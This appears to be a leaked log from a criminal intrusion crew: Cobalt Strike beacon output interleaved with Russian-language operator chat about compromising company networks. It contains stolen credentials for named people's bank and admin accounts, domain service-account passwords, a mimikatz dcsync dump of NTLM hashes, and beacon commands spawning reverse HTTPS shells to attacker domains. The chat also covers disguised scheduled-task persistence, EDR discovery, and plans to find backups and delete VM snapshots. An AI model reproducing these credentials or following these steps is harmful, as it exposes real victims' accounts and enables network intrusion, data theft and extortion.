Password : spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : willinglee
Password : sweet8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3019westmichael
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 355kingsleymichael
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3031olympicmichael
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://delsolpm.appfolio.com/connect/users/sign_in
Username : michaellee@missme.com
Password : young90058
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : pcho94
Password : whos90058
--- Chromium Credential (User: MichaelLee) ---
URL : https://www.efax.com/myaccount/login
Username : 2132323675
Password : 1260
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : heprmichael
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : heprmichael
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL :
Username : michaellee@missme.com
Password : spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : pcho94
Password : whos90058
--- Chromium Credential (User: MichaelLee) ---
URL : https://securedmail.bankofhope.com/securereader/login.jsf
Username : michaellee@missme.com
Password : spa0804?
--- Chromium Credential (User: MichaelLee) ---
URL : https://engpermits.lacity.org/public/control.cfm
Username : Michael Lee
Password : kingsley355
--- Chromium Credential (User: MichaelLee) ---
URL : https://engpermits.lacity.org/public/control.cfm
Username : michaellee@missme.com
Password : kingsley355
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : rcrvmichael1
Password : Rcrv8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 2987
Password : mm0058
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 29873180
Password : rock0058
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 3180
Password : rock0058
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 3601
Password : dm0058
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : michaelmaison
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : missmemichael1
Password : spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : heprmichael
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : pcho94
Password : whos90058
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : willinglee
Password : sweet8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : 3019westmichael
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : d&mmichael1
Password : Spai8040
[*] Finished Google Chrome extraction.
``````
Domain Controllers:
Server Name IP Address
----------- ----------
MM-DC1 192.168.1.2
MM-DC2 192.168.1.111
MM-DC3 192.168.1.214
``````
Teemo[HQ217]MichaelLee */13384|2020Dec22 01:33:58> shell net group "Domain Admins" /dom
[Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain MissMe.local.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator JasonTak MEGACOM
ThomasChang
The command completed successfully.
Teemo[HQ217]MichaelLee */13384|2020Dec22 01:34:24> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain MissMe.local.
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
Administrator ServerAdmin$ ServerAdmin1$
ServerAdmin2$
The command completed successfully.
Teemo[HQ217]MichaelLee */13384|2020Dec22 01:34:51> shell net localgroup Administrators
[Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
megacom
megacom1
MISSME\brandonsantana
MISSME\Domain Admins
MISSME\IT_Admins
MISSME\MichaelLee
thomas
The command completed successfully.
``если с закрепами закончили то переходим к разборам-``
AnyDesk autoupdate#39932 20/01/2021 05:31:07 p. Listo
pjfrancocru sfe16537 corp.televisa.com
контекст юзера обычного непринуждённого
```ага, удаляютсяудалил, остался ?я сразу удаляля просто делаю билд и удаляю после скачивания скажу навернякаудалите последние своиудалёные лог сохраняет?ahyhaxmasakaкаких?но я по логам вижу только 2 билдавы закрепили 3 штукия снова чет не понимают к надо выбиться на другую тачку для закрепа что логичнов первую очередь отрабатываем те что с -сам закреплю у меня окпонялтакая же хрень[ ](https://mediaeveryone.com/channel/general?msg=b7uTJGwpAAPqPF7uW) и я только интеракт нажал[ ](https://mediaeveryone.com/channel/general?msg=KNnZDaj5uGyeJmFNs) через инжект в соседний процес из процеслистав плане только в другой сесси с тачкой возможно было работатьу меня такие краши только спавном и лечилиськобальт крэшитсяинтерактомкрашит как?вы там пишете спавнcedarfinancial.localbenihana.com не крепится
247InTouchPCl.local стоит минус, ты в ней чёт мутил, никто и не трогал больше
cedarfinancial.local крашит кобутут мыработаюта остальные то в сетяхну двое с закрепамигде еще 2?2 человека работают?если старый убрали - окбля я говорил @user8старый погасилdough sccy-lt04 sccy.comвы 2 билда повесили тут?[ ](https://mediaeveryone.com/channel/general?msg=KTsDPaLzaBZtfH7EX) есть[ ](https://mediaeveryone.com/channel/general?msg=xbWP52aMQTtnX34cp) как перезапустить?``
контекст юзака
dough sccy-lt04 sccy.com
Microsoft Teams autoupdate#81727 1/20/2021 6:15:52 PM Ready
```[ ](https://mediaeveryone.com/channel/general?msg=Euqwmkbt9wtAhdJid) этой нетща я перезапускаю в sccy.comмоя?3 штуки и 1 не прилетела?все?агадлл на месте?даlfстарое удалил?ребилд делал?)[ ](https://mediaeveryone.com/channel/general?msg=k5rvLkBNzcF4RimTH) Microsoft Teams autoupdate#15903 20/01/2021 05:06:56 p. Listo[ ](https://mediaeveryone.com/channel/general?msg=iqCETTGajeCX9rTuM) нетуcorp.televisia.com.mx 10.170.4.168 pjfrancocru SFE16537[ ](https://mediaeveryone.com/channel/general?msg=qo75xSCiBZEqdcN35) есть``
контекст юзера
occdr occremote191 nk.spirit.com
Skype maintenance task#13547 1/20/2021 6:07:49 PM Ready
``спасибо, естьдругое дело`midwestsign.com 192.168.11.166 jkielsa CTXA715-04`[ ](https://mediaeveryone.com/channel/general?msg=LmhG5G4tPR6HmBu8L) есть такой`CTXA715-04`мне надо внешний домен + тип прав (система, юзер), хостнейм`Mitel autoupdate#82604 ` закреп естьну затупили конечнода, я давал несколько билдов и правило не отменялось + вам дали доступ делать их Н количествону ты и давал несколько билдов, просто не сопоставили + поторопилисья ведь сколько раз говорил: 1 билд 1 запускв любом случае переделываем быстреетехнические детали зачем? вам сказали делать так, надо было спрашивать сразу...если ИД тогда понятно.... не зналя бы вам мог выдать 1 длл на домены всем и не заморачиваться с тулспанельюв этом смысл генерациикаждый билд уникален в него прошивается свой IDа вчем причина? они все равно на одни и те же домены стучатся?я еще спрашивал вас помните ли вы как это делаетсяя в ахуедлл и штаскуи все старые удалитьтам не один билд надо а как минимум 4сейчас новый билд и закреп сделаю[ ](https://mediaeveryone.com/channel/general?msg=rxocXEpBqPrxag3c2) я все еще жду ответя вижу в тулспанели что последний билд собран 1.5 часа назадвы забыли что на 1 закреп 1 билд?я задам очень простой вопрос+давы крепили одним и тем же билдом...?подскажитеменя минут 5 назад выкинулокак давно крепили?открывался бы он ещё, сразу коба гаситсяпри взаимодействиикобу дропаетеще нетэтот не крепили?cedarfinancial.local1 = Skype autoupdate#35434 1/20/2021 5:38:26 PM Ready``
192,168,0,2 Hgutierreze SFE18491 CORP.TELEVISA.COM.MX
McAfee autoupdate#45234 20/01/2021 04:34:49 p. En ejecución
```+вы собираете на оба домена да?corp.televisa.com.mx 10.170.4.168 pjfrancocru SFE16537[ ](https://mediaeveryone.com/channel/general?msg=YjxfWdJLDuKfhcQEJ) 2[ ](https://mediaeveryone.com/channel/general?msg=nJ8rdQuMvHZMhNpY6) 1пока да. про мимо это про какие?[ ](https://mediaeveryone.com/channel/general?msg=TfnbXH6dmoi4kytp6) ?`CTXA715-04` так и не прилетела ?у всех длл на месте и штаска тоже?пока оба мимо`midwestsign.com 192.168.11.166 jkielsa CTXA715-04`как у @user7коба повисла с этой сессиейc u9в соло крепишь?nk.spirit.com 10.0.0.20 occdr occremote191еще закрепы есть?которые были до этогозакрепленные тоже отмечайте плизв процессе, небольшой перекус былчто нибудь закреплено?соотв там где не встал закреп -окгде закреплено пишите + самым первым символов в Noteглавное закрепитеможнов какой кобе крепить есть разница? во входной можно?у вас доступ к билдеру естьраньше я делал)ясно, просто так раньше не делаливы же не собираетесь работать только с 4 сетями?там не 1 к 1 если чтовсея не вдуплил, нам все сети закрепить или только свои?всего 2 сетичто то еще закрепилось?допишите коменты во входной кобеправил выше сообщениев общей кобе делайте маркировки что закрепленоя там ад снимаю ты делаешь спавн@user8 смотри активность сессиивам надо как можно большей сетей закрепитьлибо дальшелибо делай права``
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] tmevtmgr.sys Found
[+] TMUMH.sys Found
[+] 2 EDR Products Found!
======================
| Vendor Information |
----------------------
[Trend Micro Inc Found!
``````
====== AntiVirus ======
Engine: Trend Micro Apex One Antivirus
ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\NTRmv.exe
Engine : Windows Defender
ProductEXE : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
Engine: Trend Micro Apex One Antivirus
ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\TmListen.exe
``что за ав?ни делкой, ни листенерому меня в benihana.com удалилась делка для закрепа и в мою кобу она не летит чотаsccy.comа какой домен?долго но прилетелане еще что ли?скорее всегооно?`Adobe SvcRestartTask#20900 1/20/2021 4:10:24 PM Ready `такая конструкция в имениautoupdate#а как задача называется?штаск?дадлл на месте?ну да, новый сделал и закрепилты тем же билдом крепил?[ ](https://mediaeveryone.com/channel/general?msg=kMNDp3SkYZuKMzv6f) пока не вижу10.0.0.59 system* sccy-05[ ](https://mediaeveryone.com/channel/general?msg=GeQz5F9CRCzqu5fkx) у меня этот домен, помеченав другой сессии взято и не подписано``
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
``мы теряем работувзята не взята в душе не знаюно пустая``
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
Teemo beacon> spawn https
[*] Tasked beacon to spawn (x64) windows/beacon_https/reverse_https (ownjar.com:443)
[+] host called home, sent: 261643 bytes
```ребят я вас очень прошу маркировать взятые сессиив работе и закреплена?main.crispregional.orgя открылспасибосоздалнет, конфы нет)если есть конфа то можно добавитьзакреп окконфа?закреп - ококтакой есть т е прилетелну хз, на нём пометки не было я и взялтакой есть``
192.168.0.2 SYSTEM* SFE18491
CORP.TELEVISA.COM.MX
```
`CORP.TELEVISA.COM.MX\Hgutierreze R8WTksIOle1rP8)P`и можно группу создать с этим доеном плзщас домен``
10.1.111.100 jgemperline BEN1064-MGR-10
benihana.com
```и еще внешние домены пишите пожалуйста[ ](https://mediaeveryone.com/channel/general?msg=Ct9XShzSPimmfyrK5) +а, все. вижупроверь файл и штаск173.234.155.15 192.168.75.175 https SYSTEM * CRRHORC19нету такого...система имя компаили доменмне надо хостнеймэто юзер?закреп
SYSTEM * CRRHORC19окей. тогда тебя не дергаем[ ](https://mediaeveryone.com/channel/general?msg=3BXgDHmQC8hAECd5s) Пока да, нужно лабо подготовить к завтрешнему дню, но я рядом)у всех ок с билдами?вдруг где будет сразу домен админоперативно соберите хеши на брут для @tl2и сделайте как у @user9щас всем перевключу модуль[ ](https://mediaeveryone.com/channel/general?msg=fypApjmJxLdv9EZf6) да, получилось@user3 ты пока не с нами от слова совсем верно?настраиваю лабыпоробуй еще разок обновить стр и сбилдитьBenjaminCallsскину сюда несколько билдов(```
{
"domains": [
{ "kalarada.com",
"tuxomibo.com"
],
{ "bit": "x64",
"period": 15,
"lasthope": 65
}
```не помоглорелогин пробовали?дайте параметры из show?такая же хреньновые не скачатьни одной помеченой сессиигде @user3 @user7?крепим оперативно или вам тупо будет не с чем работатьи доменыв тулпанели обновили билдраскидайте сейчас закрепы на входные точкипометиля не пометил, во входной живаяникто не пометил свои сессии? 2 человека и у одного мертвая сессияу тебя окнет, всемне крепимты мне?отменатолько 1так ну что?+даlfот юзера запуск?10.0.67 dough SCCY-LT04если дропает то работаем дальшескинь длл плизмакафи
```
4836 924 naPrdMgr.exe
``тогда какой ав?elfkbkfcmдаона же должна лежать в папке после запуска?среди тасков не вижу2 мин2 vby``
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 1/21/2021 1:00:00 PM Ready
AdobeGCInvoker-1.0 1/21/2021 8:06:00 AM Ready
G2MUpdateTask-S-1-5-21-1989139100-303601 1/20/2021 2:38:00 PM Ready
G2MUploadTask-S-1-5-21-1989139100-303601 1/20/2021 3:47:00 PM Ready
OneDrive Standalone Update Task-S-1-5-21 1/21/2021 11:04:46 AM Ready
```[ ](https://mediaeveryone.com/channel/general?msg=MnXjJmjcc5SNGbCHi) есть?уже прочитал выше))без ДА[ ](https://mediaeveryone.com/channel/general?msg=g6oErPtYMLQZGn8bp) еще да нетусессия 173.234.155.15 192.168.37.115 https amypriest CRRHHCC4дав штаск же пишется?[ ](https://mediaeveryone.com/channel/general?msg=wPganWRj5HC2WAB5q) а это где?ток сессия отвалиласькрепилДа@all кто-нибудь тут?еще не крепили?не забывайте хеши кидать @tl2сделалможно конфу CRISPREGIONAL.ORGпишите сессию где уронилиуже можно[ ](https://mediaeveryone.com/channel/general?msg=9AnAuKnpThCWdiR9Y) ну как можно будет крепить, скажина входные точки уроните да[ ](https://mediaeveryone.com/channel/general?msg=2ySXTddqwbmCmuARP) после ДА закреп или сразу?проговорите на всякий случай пожалуйста+правила запуска помните?которые уже там естьюзаем 2 доменат к может быть так что неск сессий из одной сетивсегда проверяйте доменщас мб домены сменятсяпока не запускайте)перед запуском скажите где запускаетепоэтому по классике крепим входные точкизапускать уметесобираете себе длли последнее просто 65интервал от 15 до 20просто чекайте оба доменавопросы как пользоваться есть?+увидели новый тул?сделалконфу плзsccy.comоткрываю вам новый раздел в тулзахща поглядимпрям очень хорошему сразу поднятие до ДА и закрепда)разбираем?один есть)пустая..входая коба``
192.169.6.82
https://ownjar.com
----------------------------------------------------------------------------------------
185.150.190.153:49698
9AR3B4a2bORZSN28ST8wLqbH0F0Wvo5buE2
```пока отвлекитесьмежду собой координируйтесь и в конфу уточняющие вопросы и логи по работепоробуеможет закроем сегоднядавайте тогда все работаем над балиморуже пятьна местеа где @user9?@user3 off былпока 4а сколько вас?балимор буду раскручивать, искать насы бэкапы и прочеекакие?)дапривету всех задачи есть?Всем привет``
URL : https://id.sophos.com/
Username : ithelp@teng.com
Password : expFedAdm1n$
``[ ](https://mediaeveryone.com/group/expfederal-com?msg=5ptz5FSD23puGa8zk) еще один сторейдж, креды те же
```
https://10.20.4.52/ui/#/host/storage/datastores
```[ ](https://mediaeveryone.com/group/expfederal-com?msg=xuQ42XB7ok3LqQZp6)` portscan 10.20.4.56``HOBBES\SAVDBAdm exp.FederalSAV`посмотреть что на серваке - рут то есть вонудалить снапшоты да залочить вритуалки сами внутри которыечто "как быть"?@tl2 как быть?и вроде как не в адэто никсовый серввот там 43 тб вижу дисксетевые диски и прочеечекайте снапшоты виртуалокНашел такой `beremote.exe` бекап Symantecвот этой штуки нет в ад комп
```
--- Chromium Credential (User: RamirezJ) ---
URL : https://uschi-vhp001.hobbes.loc/ui/
Username : root
Password : VXRail-2018
```этот недоступен?5480[ ](https://mediaeveryone.com/group/expfederal-com?msg=2XfcWXmLos5yfgNqm) а какой пул сканил?не канает[ ](https://mediaeveryone.com/group/expfederal-com?msg=vBgkQCXAf4mHaxmb7) зайди через ип на фул урлага доступен``
10.20.4.56:636
10.20.4.56:514
10.20.4.56:443
10.20.4.56:389
10.20.4.56:88
10.20.4.56:80
10.20.4.56:22 (SSH-2.0-OpenSSH_7.4)
```по ип поробую443 открыт?агавообще резолвится?с тачки его кинули зайдите по ипкиньте с его тачки тогда))а вы сокс кинули...?[ ](https://mediaeveryone.com/group/expfederal-com?msg=N4pwzS2x547npWLnj) точнее не креды, а вообще не заходит по ссылкебольше доступов нет?угу никсовый``
>operatingSystemServicePack: Likewise Open unknown.unknown
``[ ](https://mediaeveryone.com/group/expfederal-com?msg=yvriitbtxRt3kXxTo) никсовый, креды не подходятну же везде хорошо быть должно
иначе как бы мы работали = )почти всеага, и все машины с одинаковым ла ;)приятно видетьв кои то веки корректно настроенысервисные акки``
HOBBES\SVC-SpPCHIDBG001 D66pHukJG5W7RwZD8PXi
HOBBES\SpSvcApps_pchiwsg001 QGVS3bbeW03Rp7UUYIoD
```
какие у них интересные креды)```
--- Chromium Credential (User: RamirezJ) ---
URL : https://uschi-psc001.hobbes.loc/websso/SAML2/SSO/vsphere.local
Username : Hobbes\RamirezJ
Password : Reva:thedog2017
``сработало, спасибо``
URL : https://login.veeam.com/
Username : javier.ramirez@expFederal.com
Password : VM4l4d33n0r4l4d33n
```бинд пайп попробуй`USCHI-BKP110` похоже на veam``
>description: Hyper-V server
USCHI-VHH010.Hobbes.loc
``````
HOBBES\RAMIREZJ Reva:thedog2017
HOBBES\SLADMIN SLTadmin2003
HOBBES\SLUSER SLTadmin2003
`57/146 живых`hobbes\svc-nwa001 KeysOfTheKingdom!`10.20.32.20vCenter 5.1 Server 2013 - PCHIAPG008.Hobbes.loc
vCenter 6.x -USCHI-VCH001.Hobbes.locну может и в админку вцентре пустить вполне под доменынми кредами ДА какого-нибудьпроверь фс и диски?```
вцентр вроде на винде
```
надо убедиться что снапшоты храняться там же на серверевинв общем пингуем, сортируем и прочееа ты глянь ОСбэкап сервера тоже помечены в адкомп, тоже виндовые)
```
>description: vCenter 5.1 Server 2013
>description: vCenter 6.x
```вцентр вроде на винде``
>operatingSystem: Windows Server 2008 R2 Standard
``+++++все тут?user9user4по технарям пройдитесь
поищите инфу по бекапам
убедитесь что есть доступ в вцентр (или что он на винде и прилочится нормально)
посмотрите виам куда бекапит
и можно прибиватьОкнах оно нужно палить попусту бекдоры там ?то и не крепитеесли сегодня закрываемдавайтеСегодня?дл щас выдамSOPHOSсорт серверов и т ди можете ее готовить к закрытиюскажите сразу АВзяли два серваканашли?кидай делки @tl1``
Teemo[PCHIDCG003]SYSTEM */4764|2020Dec11 00:33:52> dcsync Hobbes.loc
[Tasked beacon to run mimikatz's @lsadump::dcsync /domain:Hobbes.loc /all /csv command
[+] host called home, sent: 438858 bytes
[+] received output:
[DC] 'Hobbes.loc' will be the domain
[DC] 'PCHIDCG003.Hobbes.loc' will be the DC server
[DC] Exporting domain 'Hobbes.loc'
7351 TENG-ACCT$ 6d3a02a1dbfcc07957d1df41d5444768 2080
3781 SQLAgentCmdExec b3a7b463713310b416251471777fa0d3 66048
15301 SP_SSRS 076408f8e718dad08ad94a5e5019f762 66048
13103 SP_SRV 68a80609b1306f1e3add3f5b0c9ff181 66048
15642 SQLTESTDBUSER 2226330629e28473c4d290b17dcab0d0 524802
19340 SVC-Openfire-Admin a3f0910d49ba088a45d243438bcc48a2 66048
13964 IWAM_FS-0027 9a2f40bbb9ff1e39133e61b289a175ea 66048
19501 SVC-DCHIAPG001 cb26b90b52d067d83acfc65c2a3b4c0f 66048
4425 WS-0005 5281901e3711eaed959498ec917c2899 66050
19566 NLB-WEB01 b61901c0ca1611bb197131cd56943faf 66048
18841 RIVERBED 85ad7a16dda051d635ac3821b15a8271 16843264
13424 SP_Guest e6d9170e90f4a7e6f21280ed3c0517d1 66048
20202 SVC-RENDERFARM f62c5ee137914dd9ee56e91190121002 66048
17077 SP_FARM2 8cad7030797f2f44f72788f7f8a6b1f4 66048
13505 SP_GuestACS f2d438a9fe97ee2eaad900e0dd2c63b1 66048
15469 SQL-RPTSCHPHN a9bed826519203d82a8ae1c1432b1486 66048
18828 sh-0003$ cd40fb78af6248e3544a4af7478e0d 4096
20253 SVC-SPBACKUP c311b011bfc2f32edab6c95c0caf6fa3 66048
19564 SVC-DCHIAPG001-APP01 da15412388a03c8ac31dfcce8afd09b8 66048
20279 PCHIWSG009$ e52deef2201a59ed99dc0db24eb4b82f 4096
20733 PCHIWSG008$ 18daa9eebc41709766da594298307a07 4096
13502 SQL-vCenterAdmin a1940aad3133f4f21d61c22435b9fb65 66048
17002 SP_FARM 8cad7030797f2f44f72788f7f8a6b1f4 66048
12460 DCDHCP 68a80609b1306f1e3add3f5b0c9ff181 66048
16747 SSRSTengRpt 8c1542d97d9b79b48c06e1c07b07a232 66048
7721 EQLOANER 53f7c8703df697d350750a011e2fe088 66048
6310 SECMON 6b23cfaefade6334400928e42b6e2b5c 66048
16807 SQL-IRoARpt ee5ffe7df654e6904ab88711d8d94c78 66048
4316 Tririga Admin f3229ad17598f5bcd0b272d7670d8eb5 66050
20794 SVC-SQL0005ToDMZSQL d77025566bfab9149fd7b2124675677f 66048
20281 SQL-DeltekToTengRO 5cec88ff3d9b6fb93510849984b6f452 514
3076 DILBERTXX 54229da8f8d221fc1aeb94f04d61ecc1 66048
19237 SVC-DCHIDBG001 8512ff5982fcd48d9ea4e717e225cd91 66048
21794 SPTestUser 6364271e1a2232e42ecb3406eeb8f823 512
19529 PCHIAPG004 3c7ea1911b9f90f57889716ef346e1c3 512
18080 WS-0007 68a80609b1306f1e3add3f5b0c9ff181 514
18748 VSSQL0003 90655ec9fe04e0b27291e5da2c0013b7 514
17857 VSSQL0002 7059bd4edfb8547c89108945313e7be4 514
19530 PCHIWSG003 7be11b959ab976ca7472f96d1b2560fb 514
19522 PCHIWSG002 6dfd7e3370334bd0744c9accd5c1061a 514
19521 PCHIWSG001 ad63cfb46defee50ed6b3dbb3b394ac1 514
21234 PCHIDCG002 21795387c0638972a387d8780383fa0d 514
19516 PCHIAPG003 69e793f4f0cdfb4cfe22a4f8ecdde1b2 514
19523 PCHIAPG002 559b2d5277ca59a70c1a839e6224ab59 514
12699 SP_IIS_APP01 076408f8e718dad08ad94a5e5019f762 514
12700 SP_IIS_APP_USACE 076408f8e718dad08ad94a5e5019f762 514
17193 sp_ACSgc 09f18ad0dfb95eece617c5cb6a6578ce 514
13116 ftbenningg1 e5ccb8571d2ff5323cc5012439b4e7 514
13504 _SP-ACS 076408f8e718dad08ad94a5e5019f762 66050
19707 sp_pmacs fb3f42647b2dc1d1fc3650cfbbcf9ed4 66050
13514 _SP_IRoA 076408f8e718dad08ad94a5e5019f762 66050
19708 sp_imacs fb3f42647b2dc1d1fc3650cfbbcf9ed4 66050
13576 sp_clientacs f2d438a9fe97ee2eaad900e0dd2c63b1 514
13123 _SP FtBenning 076408f8e718dad08ad94a5e5019f762 66050
13105 SP_SEARCH_SRV 076408f8e718dad08ad94a5e5019f762 66048
13400 sa-sharepointdba 076408f8e718dad08ad94a5e5019f762 66048
21245 SVC-CDR-CallLogDrop 65848727f354af155f640c7b978ccc6f 66048
15524 SQL-AppAuction a8641e863021a0097288225e2c3225ae 66048
19914 SVC-IROA-SP-IROA2DB ba8b91f6c6b4a57196b5f98dec0239b6 66048
18902 DCHIAPG001 eb8162e99613ee77d748ebef863beb97 66050
18903 PCHIAPG001 b1cd050101dc230f5c379b6a1edbe00f 66048
19742 SVC-ZENOSS 6e9d7f9b4eabc311d8fe548ccaf3827b 66048
20063 PCHIAPG002$ acf70e009b52f487059320b52dd8c415 4096
7353 CMICSUPPORT 24e07a99097e95374e2ba0fae7716c15 514
1975 EXCRES e28c2ffc7b411f62a01089a7d746c088 514
21785 LT-900223 bf89f60275e8e1e1b6ef9750d04da952 66048
34794 exmerge 757d1c465d04ef58ba57fd699f92b97c 512
22079 Terry.Thompson e491d1b24f392f21ce9a38070555bc3d 66050
33887 SP2013content 7b2784302223746c3ab288de4f44fb82 66048
33890 SP2013superreader ef18fad8d8c04de6b98191c55c228f87 66048
33883 SP2013install 505e41852a2bc9a2cf8dfeccee93ed08 66048
33891 SP2013sqlinstall d20c68065f87178df8f204838dcc3ad4 66048
34822 SCOMreader d44a4e4513964adca599356bed8a663e 66048
34825 SCOMwriter 12951f364679fe127dcca1369ea37101 66048
34812 SCOMdb 8e6d2e3f01be9ab7c510fb6960a734e5 66048
34835 pfink 9dc4be7322f4e85d97f8cd6d0a5e898d 66050
21233 krbtgt_29044 3f84d34fdca0041f3892f60692b2ebc9 514
15274 FS-0056 67dbfb53036906e36170593182eb7990 66048
13944 FW-0015 2c50e78ba2f50b0b8a83cd9b0757fb71 66048
13013 DEXTERRA ccc6930692ded0b8694ca5438d71081e 514
34734 splunk-test 174009eab65310987c9f0a53e0d2baca 514
37324 Jeff.Roemer 6131349933cb5fc2f2d65ee3bd57d295 514
37325 Zach.Gardner 5988814a367010a477b94e0f07b1e0f3 514
37326 Mark.Dvorak aecc10cfeb546d6fcebf6171e1ed99ba 514
37351 Steve.Dalo 37ac503d0e481716d218c2a6e74cce1b 514
36513 Bob.Jeffers 8ec39ee848b3dba7c1c0cc9fb650f906 514
36227 Raymond.Lowman 6e564b6f12b7feda82b04582fe65842f 514
37668 Duanne.Mclaine e82d29c0dfb2ad3d18dce800cd4cf390 514
22090 Loblaws 93b0ef17748fc3f0c228a298ce520e31 66050
20227 PCHIAPG008$ 488f797b3dcead9be0a6121b63ca6c0a 4096
33755 John.Williams a863beff0611411e77a091f169f2163f 514
22062 Mauro.Crestani 8c0219b11dcc34266444df1aa4c78d64 514
34332 Kathy.Ng 2aa01ad1babd992e685a997645e46e9f 514
37332 Todd.Hill 1ffbcdafa9d05573fdd2e0854633172a 514
34330 Chad.Groshart 2aa01ad1babd992e685a997645e46e9f 514
34331 Lee.Simon 2aa01ad1babd992e685a997645e46e9f 514
35872 Catherine.Leskowat d048edb521fd72258ede9f4bbbcb58d2 514
36525 Randy.Baccadutre fd111572adcc65e3d7bd4f284386b473 514
35817 Brad.Daniel 7e239559ff9da84f62f429c35943f46a 514
34333 Peter.Ellis 07759524c6fe35b1fb9227afd35a2bbd 514
36205 Christina.McAlhaney d90e2ee11481a93453c8bdf53b667f8f 514
36522 Grace.Spear d84339a30ab9777b2a9b8265bc11b5ef 514
36511 Greg.Wys d84339a30ab9777b2a9b8265bc11b5ef 514
36510 Dennis.McNeil d84339a30ab9777b2a9b8265bc11b5ef 514
36509 Brian.Donnelly d84339a30ab9777b2a9b8265bc11b5ef 514
36512 Peter.Schreiber d84339a30ab9777b2a9b8265bc11b5ef 514
36209 Philip.Kerrigan 22b54f16e554f9cc50fca8990a621af2 514
34336 Ken.Neuhauser ea30d8683ffe121232568a7990c16066 514
34335 Chris.Schumacher 7324dee82144e76bcb64107fbfecffa7 514
34334 Alex.Lukachko 2aa01ad1babd992e685a997645e46e9f 514
22010 Christine.Brazill dcf1598abf0d61b14aa2c24a39e4f42a 514
21856 Daniel.Goodman cffcadaf230a1ba1697233f4ed8a9a37 66050
22013 DJ.Bailey dcf1598abf0d61b14aa2c24a39e4f42a 514
33769 Melinda.Fitter a1f97b707ceeb397aa667655180fdaee 514
22080 Richard.Eber 08844bb002c6fe66315e6e93efbb07 66050
37362 Bryan.Johnson 760712966d90ecf2ad3e341b354442b5 514
37363 Debra.Cohen 23997056a7dddf659383c3c769dbe579 514
37361 Jason.Popovic 55139ce93d8fc92fa3b0c1d33d530fa2 514
37364 Lauren.Martin 1429bbfdb4c18e80281ac488b8067b4e 514
36968 Bob.Beringer 88f525992fb5f7cc19c57a2fa86591e8 514
36969 Will.Pullen d27a63d44b2d08d1e64ef9c8ff0d0c07 514
36977 Tony.Puckett 85331a04a1942ecfbe71f4e65457f462 514
37244 Woodrow.Simms db2d316409094252cbab1030f1085a90 514
22124 Kathy.Weise 6364271e1a2232e42ecb3406eeb8f823 514
36228 Melody.Thomas b60e068b7a0cc33febb101d731dc0c97 514
21848 Ariz.Masters e774a9021f7fb9408c587688fc83d102 66050
21855 Jake.Carlile 00ae862ed0e75a057e61f0e0288907ad 66050
21957 Ryan.Reu 32ac246a362471660a42ea7ef29b5b68 514
33744 Matt.Hamrick 8ec39ee848b3dba7c1c0cc9fb650f906 514
33742 Jamie.Setter 2aa01ad1babd992e685a997645e46e9f 514
21894 Theresa.Bridges 434f2ce607a0b358588ca562ce973bd6 66050
